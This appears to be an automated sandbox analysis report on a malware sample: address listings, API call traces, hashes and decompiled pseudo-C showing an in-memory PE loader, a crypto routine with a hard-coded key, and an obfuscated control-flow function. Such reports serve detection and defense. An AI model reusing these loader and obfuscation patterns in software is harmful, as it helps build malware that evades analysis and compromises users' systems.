                                          0x006c32df
                                          0x006c32ea
                                          0x006c32f5
                                          0x006c3300
                                          0x006c330b
                                          0x006c3316
                                          0x006c331e
                                          0x006c3329
                                          0x006c3334
                                          0x006c3347
                                          0x006c334e
                                          0x006c3359
                                          0x006c3364
                                          0x006c336f
                                          0x006c337a
                                          0x006c3385
                                          0x006c3390
                                          0x006c339b
                                          0x006c33a6
                                          0x006c33ae
                                          0x006c33b9
                                          0x006c33c1
                                          0x006c33ce
                                          0x006c33d2
                                          0x006c33da
                                          0x006c33e2
                                          0x006c33ed
                                          0x006c33f5
                                          0x006c3402
                                          0x006c340d
                                          0x006c3418
                                          0x006c3423
                                          0x006c342e
                                          0x006c3439
                                          0x006c3444
                                          0x006c344f
                                          0x006c3457
                                          0x006c3465
                                          0x006c346a
                                          0x006c3470
                                          0x006c3474
                                          0x006c347c
                                          0x006c3487
                                          0x006c3492
                                          0x006c349d
                                          0x006c34a8
                                          0x006c34b3
                                          0x006c34bb
                                          0x006c34c3
                                          0x006c34c8
                                          0x006c34d0
                                          0x006c34db
                                          0x006c34e6
                                          0x006c34f1
                                          0x006c34fc
                                          0x006c350e
                                          0x006c3513
                                          0x006c351c
                                          0x006c3527
                                          0x006c3532
                                          0x006c353d
                                          0x006c3548
                                          0x006c3550
                                          0x006c355b
                                          0x006c3566
                                          0x006c3571
                                          0x006c357c
                                          0x006c3587
                                          0x006c358f
                                          0x006c359a
                                          0x006c35a2
                                          0x006c35af
                                          0x006c35b0
                                          0x006c35b4
                                          0x006c35bc
                                          0x006c35c4
                                          0x006c35cf
                                          0x006c35da
                                          0x006c35e5
                                          0x006c35f0
                                          0x006c35fb
                                          0x006c3606
                                          0x006c3611
                                          0x006c3619
                                          0x006c361e
                                          0x006c3626
                                          0x006c362b
                                          0x006c3633
                                          0x006c3647
                                          0x006c364e
                                          0x006c3656
                                          0x006c3661
                                          0x006c3669
                                          0x006c3679
                                          0x006c367e
                                          0x006c3684
                                          0x006c368c
                                          0x006c3699
                                          0x006c369c
                                          0x006c36a0
                                          0x006c36a8
                                          0x006c36b0
                                          0x006c36b8
                                          0x006c36c3
                                          0x006c36ce
                                          0x006c36d9
                                          0x006c36e4
                                          0x006c36ef
                                          0x006c36f7
                                          0x006c3702
                                          0x006c370d
                                          0x006c3723
                                          0x006c372a
                                          0x006c3735
                                          0x006c3740
                                          0x006c374d
                                          0x006c3750
                                          0x006c375c
                                          0x006c3760
                                          0x006c3765
                                          0x006c376d
                                          0x006c3778
                                          0x006c3780
                                          0x006c378b
                                          0x006c379e
                                          0x006c379f
                                          0x006c37a6
                                          0x006c37ae
                                          0x006c37b9
                                          0x006c37c1
                                          0x006c37c6
                                          0x006c37cb
                                          0x006c37d0
                                          0x006c37d8
                                          0x006c37e3
                                          0x006c37f6
                                          0x006c37fd
                                          0x006c3808
                                          0x006c3810
                                          0x006c3818
                                          0x006c381d
                                          0x006c3822
                                          0x006c382a
                                          0x006c383d
                                          0x006c384d
                                          0x006c3854
                                          0x006c385f
                                          0x006c386a
                                          0x006c3875
                                          0x006c387d
                                          0x006c3888
                                          0x006c3890
                                          0x006c389d
                                          0x006c38a1
                                          0x006c38a9
                                          0x006c38b3
                                          0x006c38be
                                          0x006c38c9
                                          0x006c38d1
                                          0x006c38dc
                                          0x006c38e4
                                          0x006c38e9
                                          0x006c38f1
                                          0x006c38f9
                                          0x006c3901
                                          0x006c390c
                                          0x006c3917
                                          0x006c3922
                                          0x006c392d
                                          0x006c3938
                                          0x006c3940
                                          0x006c394b
                                          0x006c3953
                                          0x006c3958
                                          0x006c3960
                                          0x006c3965
                                          0x006c396d
                                          0x006c3978
                                          0x006c3980
                                          0x006c398b
                                          0x006c3993
                                          0x006c399b
                                          0x006c39a9
                                          0x006c39ae
                                          0x006c39b4
                                          0x006c39bc
                                          0x006c39c4
                                          0x006c39c9
                                          0x006c39d1
                                          0x006c39d9
                                          0x006c39e1
                                          0x006c39f4
                                          0x006c39f7
                                          0x006c39fe
                                          0x006c3a09
                                          0x006c3a14
                                          0x006c3a1f
                                          0x006c3a2a
                                          0x006c3a35
                                          0x006c3a3d
                                          0x006c3a48
                                          0x006c3a53
                                          0x006c3a5e
                                          0x006c3a74
                                          0x006c3a82
                                          0x006c3a87
                                          0x006c3a90
                                          0x006c3a9b
                                          0x006c3aa6
                                          0x006c3ab1
                                          0x006c3abc
                                          0x006c3ac8
                                          0x006c3acb
                                          0x006c3acf
                                          0x006c3adc
                                          0x006c3ae0
                                          0x006c3ae8
                                          0x006c3b00
                                          0x006c3b09
                                          0x006c3b14
                                          0x006c3b1f
                                          0x006c3b2a
                                          0x006c3b35
                                          0x006c3b40
                                          0x006c3b53
                                          0x006c3b54
                                          0x006c3b5b
                                          0x006c3b63
                                          0x006c3b6e
                                          0x006c3b81
                                          0x006c3b90
                                          0x006c3b97
                                          0x006c3ba2
                                          0x006c3bad
                                          0x006c3bc1
                                          0x006c3bd0
                                          0x006c3bd7
                                          0x006c3be2
                                          0x006c3bef
                                          0x006c3bf3
                                          0x006c3bfd
                                          0x006c3c01
                                          0x006c3c09
                                          0x006c3c11
                                          0x006c3c16
                                          0x006c3c1e
                                          0x006c3c26
                                          0x006c3c2e
                                          0x006c3c41
                                          0x006c3c48
                                          0x006c3c53
                                          0x006c3c5e
                                          0x006c3c69
                                          0x006c3c71
                                          0x006c3c79
                                          0x006c3c7e
                                          0x006c3c86
                                          0x006c3c8e
                                          0x006c3c99
                                          0x006c3ca4
                                          0x006c3caf
                                          0x006c3cba
                                          0x006c3cc5
                                          0x006c3ccd
                                          0x006c3cd8
                                          0x006c3ce3
                                          0x006c3ceb
                                          0x006c3cf6
                                          0x006c3d01
                                          0x006c3d14
                                          0x006c3d23
                                          0x006c3d2a
                                          0x006c3d32
                                          0x006c3d3d
                                          0x006c3d48
                                          0x006c3d50
                                          0x006c3d5b
                                          0x006c3d66
                                          0x006c3d6e
                                          0x006c3d7b
                                          0x006c3d8f
                                          0x006c3d9b
                                          0x006c3da2
                                          0x006c3dad
                                          0x006c3db8
                                          0x006c3dc3
                                          0x006c3dce
                                          0x006c3dd9
                                          0x006c3de4
                                          0x006c3df9
                                          0x006c3e01
                                          0x006c3e08
                                          0x006c3e13
                                          0x006c3e2a
                                          0x006c3e2e
                                          0x006c3e36
                                          0x006c3e3b
                                          0x006c3e43
                                          0x006c3e56
                                          0x006c3e65
                                          0x006c3e6c
                                          0x006c3e77
                                          0x006c3e7f
                                          0x006c3e87
                                          0x006c3e8f
                                          0x006c3e97
                                          0x006c3e9f
                                          0x006c3eaa
                                          0x006c3eb2
                                          0x006c3ec6
                                          0x006c3ecd
                                          0x006c3ed8
                                          0x006c3ee3
                                          0x006c3ef6
                                          0x006c3efd
                                          0x006c3f08
                                          0x006c3f08
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f13
                                          0x006c3f13
                                          0x006c3f19
                                          0x006c3f19
                                          0x006c4295
                                          0x006c4297
                                          0x006c42cb
                                          0x006c42d4
                                          0x006c42dc
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f13
                                          0x006c3f13
                                          0x00000000
                                          0x006c3f13
                                          0x006c3f0d
                                          0x006c42a7
                                          0x006c42b0
                                          0x006c42b2
                                          0x006c411e
                                          0x006c411e
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f13
                                          0x006c3f13
                                          0x00000000
                                          0x006c3f13
                                          0x00000000
                                          0x006c3f0d
                                          0x006c3f1f
                                          0x006c3f25
                                          0x006c4129
                                          0x006c412f
                                          0x006c41a9
                                          0x006c41af
                                          0x006c4278
                                          0x006c427f
                                          0x00000000
                                          0x006c427f
                                          0x006c41b5
                                          0x006c41bb
                                          0x006c424e
                                          0x006c4255
                                          0x00000000
                                          0x006c4255
                                          0x006c41bd
                                          0x006c41c3
                                          0x006c4214
                                          0x006c421f
                                          0x006c4227
                                          0x00000000
                                          0x006c4227
                                          0x006c41c5
                                          0x006c41cb
                                          0x00000000
                                          0x00000000
                                          0x006c41df
                                          0x006c41e8
                                          0x006c41f0
                                          0x00000000
                                          0x006c41f0
                                          0x006c4131
                                          0x006c4837
                                          0x006c4851
                                          0x006c4858
                                          0x006c4858
                                          0x006c4137
                                          0x006c413d
                                          0x006c419a
                                          0x006c419f
                                          0x00000000
                                          0x006c419f
                                          0x006c413f
                                          0x006c4145
                                          0x006c4184
                                          0x006c4189
                                          0x00000000
                                          0x006c4189
                                          0x006c4147
                                          0x006c414d
                                          0x006c416c
                                          0x00000000
                                          0x006c416c
                                          0x006c414f
                                          0x006c4155
                                          0x00000000
                                          0x00000000
                                          0x006c4162
                                          0x00000000
                                          0x006c4162
                                          0x006c3f2b
                                          0x006c410d
                                          0x006c4116
                                          0x006c4118
                                          0x006c4118
                                          0x00000000
                                          0x006c4118
                                          0x006c3f31
                                          0x006c3f37
                                          0x006c3ffd
                                          0x006c4003
                                          0x006c40ea
                                          0x006c40f5
                                          0x006c40fc
                                          0x00000000
                                          0x006c40fc
                                          0x006c4009
                                          0x006c400f
                                          0x006c40c9
                                          0x006c40ce
                                          0x006c40d5
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
                                          • API String ID: 0-1872862241
                                          • Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                          • Instruction ID: efa72adc63340668150a72e874c902c021041a1c228a22148b30d97ec8afb706
                                          • Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                          • Instruction Fuzzy Hash: 87D2F4715093818BD378CF25C59ABEFBBE2FB84314F10891DE19A862A0DBB49945CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
                                          • GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
                                          • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
                                          • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9
                                            • Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29
                                          • LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
                                          • LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
                                          • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
                                          • CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
                                          • CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
                                          • _memmove.LIBCMT ref: 1000139C
                                          • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
                                          • String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
                                          • API String ID: 2007481169-3150289311
                                          • Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                          • Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
                                          • Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                          • Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				intOrPtr _v44;
                                          				char _v48;
                                          				signed int _t67;
                                          				void* _t72;
                                          				long _t74;
                                          				void* _t86;
                                          				void* _t89;
                                          				void* _t90;
                                          				void* _t95;
                                          				intOrPtr _t98;
                                          				intOrPtr* _t100;
                                          				void* _t109;
                                          				intOrPtr _t111;
                                          				void* _t112;
                                          				intOrPtr _t113;
                                          				void* _t114;
                                          				intOrPtr _t115;
                                          				intOrPtr _t117;
                                          				intOrPtr _t118;
                                          				intOrPtr* _t128;
                                          				intOrPtr* _t129;
                                          				signed int _t131;
                                          				intOrPtr _t133;
                                          				signed int _t135;
                                          				long _t138;
                                          				long _t139;
                                          				void* _t147;
                                          				void* _t148;
                                          				void* _t149;
                                          				void* _t150;
                                          
                                          				_t113 = _a8;
                                          				_t147 = 0;
                                          				_v8 = __ecx;
                                          				if(_t113 >= 0x40) {
                                          					_t129 = _a4;
                                          					if( *_t129 == 0x5a4d) {
                                          						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
                                          						if(_t113 < _t117 + 0xf8) {
                                          							goto L1;
                                          						} else {
                                          							_t114 = _t117 + _t129;
                                          							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
                                          								goto L3;
                                          							} else {
                                          								_t12 = _t114 + 0x14; // 0xc033cd33
                                          								_t67 =  *_t12 & 0x0000ffff;
                                          								_t13 = _t114 + 6; // 0xe8ef4d8d
                                          								_t135 =  *_t13 & 0x0000ffff;
                                          								if(_t135 != 0) {
                                          									_t14 = _t114 + 0x24; // 0x100013ef
                                          									_t128 = _t14 + _t67;
                                          									do {
                                          										_t15 = _t128 + 4; // 0x12f7805
                                          										_t133 =  *_t15;
                                          										_t111 =  *_t128;
                                          										if(_t133 != 0) {
                                          											_t112 = _t111 + _t133;
                                          										} else {
                                          											_t16 = _t114 + 0x38; // 0xff1075ff
                                          											_t112 = _t111 +  *_t16;
                                          										}
                                          										_t147 =  >  ? _t112 : _t147;
                                          										_t128 = _t128 + 0x28;
                                          										_t135 = _t135 - 1;
                                          									} while (_t135 != 0);
                                          								}
                                          								_push( &_v48); // executed
                                          								L100037FA(); // executed
                                          								_t118 = _v44;
                                          								_t19 = _t118 - 1; // -1
                                          								_t20 = _t114 + 0x50; // 0xcc25d
                                          								_t21 = _t118 - 1; // -1
                                          								_t22 = _t118 - 1; // -1
                                          								_t131 =  !_t21;
                                          								_t138 = _t19 +  *_t20 & _t131;
                                          								if(_t138 == (_t22 + _t147 & _t131)) {
                                          									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
                                          									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
                                          									_t148 = _t72;
                                          									_v12 = _t148;
                                          									if(_t148 != 0) {
                                          										L18:
                                          										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                          										_t139 = _t74;
                                          										if(_t139 != 0) {
                                          											 *(_t139 + 4) = _t148;
                                          											_t27 = _t114 + 0x16; // 0xe85ec033
                                          											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
                                          											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
                                          											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
                                          											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
                                          											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
                                          											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
                                          											_t40 = _t114 + 0x54; // 0xec8b55cc
                                          											if(E100015F0(_a8,  *_t40) == 0) {
                                          												L36:
                                          												_t115 = _v8;
                                          												goto L37;
                                          											} else {
                                          												_t42 = _t114 + 0x54; // 0xec8b55cc
                                          												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
                                          												_t43 = _t114 + 0x54; // 0xec8b55cc
                                          												_t149 = _t86;
                                          												E10001F40(_t149, _a4,  *_t43);
                                          												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
                                          												_t150 = _v12;
                                          												 *_t139 = _t89;
                                          												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
                                          												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
                                          												if(_t90 == 0) {
                                          													goto L36;
                                          												} else {
                                          													_t52 = _t114 + 0x34; // 0xec8b55cc
                                          													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
                                          													_t115 = _v8;
                                          													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
                                          														 *((intOrPtr*)(_t139 + 0x18)) = 1;
                                          													} else {
                                          														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
                                          													}
                                          													if(E10001470(_t115, _t139) == 0) {
                                          														L37:
                                          														E10001980(_t139);
                                          														return 0;
                                          													} else {
                                          														_t95 = E10001830(_t115, _t139); // executed
                                          														if(_t95 == 0 || E10001730(_t139) == 0) {
                                          															goto L37;
                                          														} else {
                                          															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
                                          															if(_t98 == 0) {
                                          																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
                                          																return _t139;
                                          															} else {
                                          																_t100 = _t98 + _t150;
                                          																if( *(_t139 + 0x14) == 0) {
                                          																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
                                          																	return _t139;
                                          																} else {
                                          																	_push(0);
                                          																	_push(1);
                                          																	_push(0x10000000);
                                          																	if( *_t100() != 0) {
                                          																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
                                          																		return _t139;
                                          																	} else {
                                          																		SetLastError(0x45a);
                                          																		E10001980(_t139);
                                          																		return 0;
                                          																	}
                                          																}
                                          															}
                                          														}
                                          													}
                                          												}
                                          											}
                                          										} else {
                                          											VirtualFree(_t148, _t74, 0x8000);
                                          											goto L20;
                                          										}
                                          									} else {
                                          										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
                                          										_t148 = _t109;
                                          										_v12 = _t109;
                                          										if(_t148 == 0) {
                                          											L20:
                                          											SetLastError(0xe);
                                          											return 0;
                                          										} else {
                                          											goto L18;
                                          										}
                                          									}
                                          								} else {
                                          									SetLastError(0xc1);
                                          									return 0;
                                          								}
                                          							}
                                          						}
                                          					} else {
                                          						L3:
                                          						SetLastError(0xc1);
                                          						return 0;
                                          					}
                                          				} else {
                                          					L1:
                                          					SetLastError(0xd);
                                          					return 0;
                                          				}
                                          			}

                                          APIs
                                          • SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
                                          • SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                          • Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
                                          • Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                          • Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D4B41() {
                                          				char _v520;
                                          				signed int _v524;
                                          				signed int _v528;
                                          				signed int _v532;
                                          				signed int _v536;
                                          				signed int _v540;
                                          				signed int _v544;
                                          				signed int _v548;
                                          				signed int _v552;
                                          				signed int _v556;
                                          				signed int _v560;
                                          				signed int _v564;
                                          				signed int _v568;
                                          				signed int _v572;
                                          				signed int _v576;
                                          				signed int _v580;
                                          				signed int _v584;
                                          				signed int _v588;
                                          				signed int _v592;
                                          				intOrPtr _t200;
                                          				signed int _t202;
                                          				signed int _t206;
                                          				void* _t210;
                                          				signed int _t211;
                                          				signed int _t212;
                                          				void* _t214;
                                          				signed int _t216;
                                          				signed int _t239;
                                          				signed int _t240;
                                          				signed int _t241;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				void* _t245;
                                          				signed int* _t247;
                                          				void* _t249;
                                          
                                          				_t247 =  &_v592;
                                          				_v592 = 0xe399;
                                          				_v592 = _v592 << 2;
                                          				_t214 = 0xf501058;
                                          				_v592 = _v592 << 0xe;
                                          				_v592 = _v592 ^ 0xe399001c;
                                          				_v588 = 0x8f0f;
                                          				_v588 = _v588 * 0x29;
                                          				_t245 = 0;
                                          				_v588 = _v588 ^ 0x0016e94e;
                                          				_v568 = 0x725;
                                          				_t239 = 0x36;
                                          				_v568 = _v568 / _t239;
                                          				_t240 = 0xc;
                                          				_v568 = _v568 * 0x63;
                                          				_v568 = _v568 << 8;
                                          				_v568 = _v568 ^ 0x000ca091;
                                          				_v532 = 0x951;
                                          				_v532 = _v532 << 7;
                                          				_v532 = _v532 ^ 0x0004989a;
                                          				_v524 = 0x2ad;
                                          				_v524 = _v524 | 0xf8213247;
                                          				_v524 = _v524 ^ 0xf82150c2;
                                          				_v548 = 0x8830;
                                          				_v548 = _v548 >> 0xd;
                                          				_v548 = _v548 >> 0xf;
                                          				_v548 = _v548 ^ 0x00006238;
                                          				_v588 = 0xba20;
                                          				_v588 = _v588 | 0x721cc32f;
                                          				_v588 = _v588 ^ 0x721c8c06;
                                          				_v580 = 0x8092;
                                          				_v580 = _v580 + 0xfffffe56;
                                          				_v580 = _v580 / _t240;
                                          				_v580 = _v580 >> 3;
                                          				_v580 = _v580 ^ 0x000005b6;
                                          				_v540 = 0xe99f;
                                          				_v540 = _v540 + 0xfffff8d3;
                                          				_v540 = _v540 | 0x984d7063;
                                          				_v540 = _v540 ^ 0x984d8ec7;
                                          				_v556 = 0xc4eb;
                                          				_t241 = 0x4e;
                                          				_v556 = _v556 * 0x5c;
                                          				_v556 = _v556 + 0x75ac;
                                          				_v556 = _v556 ^ 0x00477921;
                                          				_v536 = 0x9b3b;
                                          				_v536 = _v536 + 0xaa1d;
                                          				_v536 = _v536 ^ 0x00012776;
                                          				_v572 = 0x8e84;
                                          				_v572 = _v572 * 0x29;
                                          				_v572 = _v572 / _t241;
                                          				_v572 = _v572 >> 0xa;
                                          				_v572 = _v572 ^ 0x000020e9;
                                          				_v528 = 0xcb2d;
                                          				_t242 = 0x21;
                                          				_v528 = _v528 / _t242;
                                          				_v528 = _v528 ^ 0x00001b4e;
                                          				_v544 = 0x6df7;
                                          				_v544 = _v544 ^ 0x414c8853;
                                          				_t243 = 0x49;
                                          				_v544 = _v544 * 0x75;
                                          				_v544 = _v544 ^ 0xd824a1d7;
                                          				_v552 = 0xc4f0;
                                          				_v552 = _v552 ^ 0x9d070a5f;
                                          				_v552 = _v552 + 0xffff498d;
                                          				_v552 = _v552 ^ 0x9d0763b6;
                                          				_v564 = 0xe384;
                                          				_v564 = _v564 ^ 0xde12aa62;
                                          				_v564 = _v564 | 0x2c019ae9;
                                          				_v564 = _v564 ^ 0xa4e5f9a5;
                                          				_v564 = _v564 ^ 0x5af67a61;
                                          				_v576 = 0x7d9f;
                                          				_v576 = _v576 + 0x6134;
                                          				_v576 = _v576 | 0x6ccc595a;
                                          				_v576 = _v576 ^ 0x0058e7ee;
                                          				_v576 = _v576 ^ 0x6c9448a2;
                                          				_v592 = 0x396f;
                                          				_v592 = _v592 * 7;
                                          				_v592 = _v592 ^ 0x10cc7cbf;
                                          				_v592 = _v592 ^ 0x10cdfb96;
                                          				_v560 = 0x3078;
                                          				_v560 = _v560 << 8;
                                          				_t244 = _v588;
                                          				_v560 = _v560 / _t243;
                                          				_v560 = _v560 + 0xffff6a19;
                                          				_v560 = _v560 ^ 0x000f142e;
                                          				goto L1;
                                          				do {
                                          					while(1) {
                                          						L1:
                                          						_t249 = _t214 - 0x3227b83a;
                                          						if(_t249 > 0) {
                                          							break;
                                          						}
                                          						if(_t249 == 0) {
                                          							_v584 = 0xc457;
                                          							_v584 = _v584 >> 6;
                                          							_t165 =  &_v584;
                                          							 *_t165 = _v584 ^ 0x0000030d;
                                          							__eflags =  *_t165;
                                          							_t202 =  *0x6dca2c; // 0x248300
                                          							 *((intOrPtr*)(_t202 + 0x218)) = E006D7CC2;
                                          							L13:
                                          							_t214 = 0x2ded9275;
                                          							continue;
                                          						}
                                          						if(_t214 == 0xf501058) {
                                          							_push(_t214);
                                          							_push(_t214);
                                          							_t206 = E006C8736(0x454);
                                          							 *0x6dca2c = _t206;
                                          							__eflags = _t206;
                                          							if(_t206 == 0) {
                                          								goto L23;
                                          							}
                                          							 *((intOrPtr*)(_t206 + 0x214)) = E006D20C5;
                                          							_t214 = 0x382146c2;
                                          							continue;
                                          						}
                                          						if(_t214 == 0x204dd1d9) {
                                          							E006CB112();
                                          							_t214 = 0x354eaa90;
                                          							continue;
                                          						}
                                          						if(_t214 == 0x24baa30b) {
                                          							_v584 = 0xe62c;
                                          							_t214 = 0x36e33d60;
                                          							_v584 = _v584 ^ 0x84d80cbd;
                                          							_v584 = _v584 ^ 0x84d8eab8;
                                          							continue;
                                          						}
                                          						if(_t214 != 0x2ded9275) {
                                          							goto L22;
                                          						}
                                          						_push(_t214);
                                          						_push(_t214);
                                          						E006CC6C7(_v536, _v572,  *0x6dca2c, _t214, _v528, _v584, _v544); // executed
                                          						_t247 =  &(_t247[7]);
                                          						_t214 = 0x204dd1d9;
                                          						_t210 = 1;
                                          						_t245 =  ==  ? _t210 : _t245;
                                          					}
                                          					__eflags = _t214 - 0x354eaa90;
                                          					if(__eflags == 0) {
                                          						E006D3E3F(_t214,  &_v520, __eflags, _v552, _v564);
                                          						_t200 = E006CE29C(_v576, _v592,  &_v520);
                                          						_t216 =  *0x6dca2c; // 0x248300
                                          						_t247 =  &(_t247[3]);
                                          						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
                                          						_t214 = 0xae4e76a;
                                          						goto L22;
                                          					}
                                          					__eflags = _t214 - 0x36e33d60;
                                          					if(_t214 == 0x36e33d60) {
                                          						E006C5FB2(_v540, _v556, _t244);
                                          						goto L13;
                                          					}
                                          					__eflags = _t214 - 0x382146c2;
                                          					if(_t214 != 0x382146c2) {
                                          						goto L22;
                                          					}
                                          					_t211 = E006C2959(_t214, _v548, _v588, _v580, _v560); // executed
                                          					_t244 = _t211;
                                          					_t247 =  &(_t247[4]);
                                          					__eflags = _t244;
                                          					if(_t244 == 0) {
                                          						_t214 = 0x3227b83a;
                                          					} else {
                                          						_t212 =  *0x6dca2c; // 0x248300
                                          						 *((intOrPtr*)(_t212 + 0x224)) = 1;
                                          						_t214 = 0x24baa30b;
                                          					}
                                          					goto L1;
                                          					L22:
                                          					__eflags = _t214 - 0xae4e76a;
                                          				} while (_t214 != 0xae4e76a);
                                          				L23:
                                          				return _t245;
                                          			}
                                          0x006d4f25
                                          0x00000000
                                          0x006d4f2a
                                          0x006d4ed3
                                          0x006d4ed9
                                          0x00000000
                                          0x00000000
                                          0x006d4eef
                                          0x006d4ef4
                                          0x006d4ef6
                                          0x006d4ef9
                                          0x006d4efb
                                          0x006d4f15
                                          0x006d4efd
                                          0x006d4efd
                                          0x006d4f05
                                          0x006d4f0b
                                          0x006d4f0b
                                          0x00000000
                                          0x006d4f64
                                          0x006d4f64
                                          0x006d4f64
                                          0x006d4f71
                                          0x006d4f7c

